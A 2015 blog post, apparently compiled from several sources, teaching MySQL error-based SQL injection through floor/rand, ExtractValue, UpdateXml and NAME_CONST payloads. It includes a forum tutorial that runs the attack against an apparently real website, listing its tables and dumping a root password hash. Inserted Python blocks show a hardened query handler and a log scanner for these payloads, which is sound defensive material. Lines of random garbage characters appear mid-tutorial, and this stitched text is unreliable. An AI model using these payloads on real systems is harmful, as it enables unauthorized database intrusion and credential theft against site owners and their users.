
MySQL error-based injection: the floor, ExtractValue and UpdateXml error modes and how they are used

Posted on 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error message leaks the MySQL version. To retrieve other data, replace the version() expression with the query you want.
For example, to query the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
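All three error functions above depend on the same two conditions: the id value is pasted into the SQL text, and the database's error message is sent back to the client. As an added illustration (not code from the original post), this Python shows the vulnerable lookup beside a hardened one. SQLite stands in for MySQL so the example runs offline; the table contents, handler names and payload are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the page's "article" table. SQLite replaces MySQL so
# that the example runs offline (assumption: the real app talks to MySQL).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER, title TEXT, content TEXT)")
    db.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    return db

# Constructed id value in the shape of the ExtractValue payload shown above.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"

def lookup_vulnerable(db, user_id):
    """Pastes the raw parameter into the SQL text and returns the database
    error verbatim: exactly the two conditions an error-based injection needs."""
    try:
        rows = db.execute(f"select * from article where id = {user_id}").fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error as e:
        return {"rows": [], "error": str(e)}  # leaks the DB error to the client

def lookup_hardened(db, user_id):
    """Type-checks the parameter, binds it as a value so it can never become
    SQL syntax, and never forwards database error text to the client."""
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return {"rows": [], "error": "invalid id"}
    try:
        rows = db.execute("select * from article where id = ?", (id_int,)).fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error:
        # Log the exception server-side; the client only gets a generic message.
        return {"rows": [], "error": "internal error"}

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))  # the DB error text reaches the caller
    print(lookup_hardened(db, PAYLOAD))    # {'rows': [], 'error': 'invalid id'}
```

On MySQL the vulnerable handler's error string would carry the extracted value just as the ERROR 1105 line above does; the hardened handler returns neither the value nor the error.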



Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

$ c1 N' s0 G! e8 p7 _' Y) Y  q( ^& N' o
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
; s( y+ C" L2 w; ]/ u0 N' W4 [; z  V

6 ]8 k; Q8 @7 h; s5 ~& M. C2 i& e6 |! z: E8 \/ [* h
7 @9 A2 k2 ]; ^
$ T7 f: e( x: A, U9 s
, L# `$ u: {5 ]$ i1 V" J
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
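From the defender's side, the payloads in all four sections (floor/rand group-by, ExtractValue, UpdateXml and NAME_CONST) carry recognisable markers in the request itself. The following Python is added here and is not part of the original post: it URL-decodes the request path from access-log lines and flags those markers. The log lines, client address and status codes are constructed for the example, not taken from any real server.

```python
import re
from urllib.parse import unquote_plus

# Request-side patterns for the four MySQL error-based techniques on this page.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}
# Request line of a combined-format access log: method, path, status code.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (status, [technique names]) for one log line, or None when the
    line has no request. The path is decoded first because the payloads above
    arrive with '+' for spaces and %xx escapes, which hide the keywords."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = unquote_plus(m.group(1))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return int(m.group(2)), hits

# Constructed sample lines: one benign request and three shaped like the
# payloads discussed above (hypothetical host, timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 4312',
    '192.0.2.10 - - [11/Nov/2015:19:03:40 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 611',
    '192.0.2.10 - - [11/Nov/2015:19:03:44 +0800] "GET /detail.php?id=1%20and%20extractvalue%281%2Cconcat%280x5c%2Cuser%28%29%29%29 HTTP/1.1" 500 598',
    '192.0.2.10 - - [11/Nov/2015:19:03:47 +0800] "GET /detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 640',
]

def scan(lines):
    """Return (line index, status, techniques) for every flagged line."""
    findings = []
    for i, line in enumerate(lines):
        result = classify(line)
        if result and result[1]:
            findings.append((i, result[0], result[1]))
    return findings

if __name__ == "__main__":
    for idx, status, techniques in scan(SAMPLE_LOG):
        print(f"line {idx}: status {status}, matched {techniques}")
```

A flagged request followed by a 5xx response is the strongest signal, since these techniques only work when the database error reaches the client; pairing this scan with the application's own DB-error log closes the loop.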